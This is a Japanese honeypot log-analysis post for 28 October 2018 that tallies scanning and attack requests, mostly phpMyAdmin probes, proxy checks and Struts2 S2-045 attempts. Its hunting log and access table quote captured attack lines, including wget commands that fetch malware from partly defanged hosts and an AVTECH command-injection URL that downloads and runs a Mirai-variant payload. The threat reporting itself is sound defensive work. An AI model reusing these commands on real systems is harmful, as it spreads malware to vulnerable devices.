ハニーポットのログ分析(2018/10/28)
WOWhoneypotの2018/10/28(運用144日目)の簡易分析です。
本日の総アクセス件数は 113件です。
主な観測内容は以下です。
・phpMyAdminの調査:55件
・不正中継の調査:11件
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:12件
・AVTECHの脆弱性を突くMirai亜種の攻撃(User-Agent: Sefa):1件
本日のドメイン名でのアクセスは以下です。
4 GET /
2 GET /robots.txt
本日のハンティングログは以下です。一番下はMirai亜種、それ以外はSturts2を狙ったものです。
3 2018-10-28 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
3 2018-10-28 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2018-10-28 wget -c hxxp://103.55.13[.]68:13333/systems
1 2018-10-28 wget -c hxxp://103.55.13[.]68:13333/system
1 2018-10-28 wget -c hxxp://103.55.13[.]68:13333/sshk
1 2018-10-28 wget hxxp://104.244.76[.]210/avtech
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
29 | 2018-10-28 | アクセス | GET / |
12 | 2018-10-28 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
2 | 2018-10-28 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php |
2 | 2018-10-28 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php |
2 | 2018-10-28 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php |
2 | 2018-10-28 | クローリング | GET /robots.txt |
2 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php |
2 | 2018-10-28 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php |
2 | 2018-10-28 | phpMyAdminの調査 | GET /admin/phpMyAdmin/index.php |
2 | 2018-10-28 | 不正中継の調査 | CONNECT 133.130.126.119:43 |
1 | 2018-10-28 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | PROPFIND / |
1 | 2018-10-28 | phpMyAdminの調査 | GET /xampp/phpmyadmin/index.php |
1 | 2018-10-28 | WebDAVの調査 | GET /webdav/ |
1 | 2018-10-28 | phpMyAdminの調査 | GET /v/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /typo3/phpmyadmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /shaAdmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /pmd/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /pma-old/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /pmamy/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /PMA/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /pma/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /PMA2/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdmion/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpmyadmin/phpmyadmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdminold/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdmin.old/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdmin+++---/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdmin__/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyadmin_bak/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdmin-4.4.0/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpmyadmin2/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpmyadmin1/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpmyadmin0/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyadmi/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAdm1n/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpmyadm1n/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpMyAbmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpma/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpAdmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /phpadmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /mysql/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /mysqladmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /mysql-admin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /myadmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /myadmin2/index.php |
1 | 2018-10-28 | phpのWebShell設置の調査 | GET /index.php |
1 | 2018-10-28 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
1 | 2018-10-28 | 不正中継の調査 | GET hxxp://www.123cha.com/ |
1 | 2018-10-28 | 不正中継の調査 | GET hxxp://www.123cha.com |
1 | 2018-10-28 | 不正中継の調査 | GET hxxp://api.ipify.org/ |
1 | 2018-10-28 | 不正中継の調査 | GET hxxp://112.35.88.28:10083/index.php |
1 | 2018-10-28 | 不正中継の調査 | GET hxxp://112.35.63.31:10083/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /db/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /dbadmin/index.php |
1 | 2018-10-28 | AVTECHの脆弱性を突くMirai亜種の攻撃 | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://104.244.76.210/avtech%20-O%20darkxo;%20chmod%20777%20darkxo;%20sh%20darkxo)&password=admin |
1 | 2018-10-28 | phpMyAdminの調査 | GET /admin/PMA/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /admin/pma/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /admin/phpmyadmin/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /admin/phpmyadmin2/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /admin/mysql/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /admin/mysql2/index.php |
1 | 2018-10-28 | phpMyAdminの調査 | GET /admin/index.php |
1 | 2018-10-28 | 不正中継の調査 | CONNECT www.baidu.com:443 |
1 | 2018-10-28 | 不正中継の調査 | CONNECT www.baidu.com |
1 | 2018-10-28 | 不正中継の調査 | CONNECT cn.bing.com:443 |
以上です。